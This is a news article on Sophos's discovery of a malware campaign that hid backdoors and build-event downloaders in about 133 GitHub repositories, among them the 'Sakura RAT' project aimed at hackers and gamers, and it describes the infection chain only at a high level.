A hacker is targeting other hackers, gamers, and researchers by uploading malicious source code on GitHub that infects devices with backdoors and remote access malware.
The operation was uncovered by cybersecurity firm Sophos after a concerned client asked about a remote access trojan (RAT) called Sakura RAT, freely available on GitHub. Though the trojan’s visible code appeared largely nonfunctional, researchers found a hidden PreBuildEvent in its Visual Studio project, which automatically downloaded and installed malware when the code was compiled, compromising the victim’s system.
The GitHub account ‘ischhfd83,’ which published Sakura RAT, was linked to a broader malware distribution network spanning 141 repositories.
According to Sophos, 133 of these contained similar hidden backdoors. The attack used multiple vectors , including Python scripts with obfuscated payloads, booby-trapped JavaScript files, malicious Windows screensavers, and more Visual Studio projects with covert build events.
The researchers believe that the observed malware is part of a broader coordinated campaign. Some repositories were abandoned after late 2023, but most remain operational. Interestingly, Sakura RAT’s media attention lured so-called ‘script kiddies’, who were enticed to download and test the code, unknowingly infecting themselves.
Once executed or compiled, the code triggers a complex infection chain. Visual Basic scripts activate PowerShell commands that retrieve an encoded payload from hardcoded URLs. This in turn downloads a 7zip archive from GitHub containing an Electron app disguised as “SearchFilter.exe.” The app runs obfuscated JavaScript capable of profiling systems, executing commands, disabling Windows Defender, and installing further malware.
Among the second-stage payloads observed were well-known info-stealers and RATs like Lumma Stealer, AsyncRAT, and Remcos.
“This investigation is a good example of how threats can be much more complex than they first appear. From an initial customer query about a new RAT, we uncovered a significant amount of backdoored GitHub repositories, containing multiple kinds of backdoors. And the backdoors are not simple; as it turned out, they were only the first step in a long and convoluted infection chain, eventually leading to multiple RATs and infostealers,” Sophos conluded.
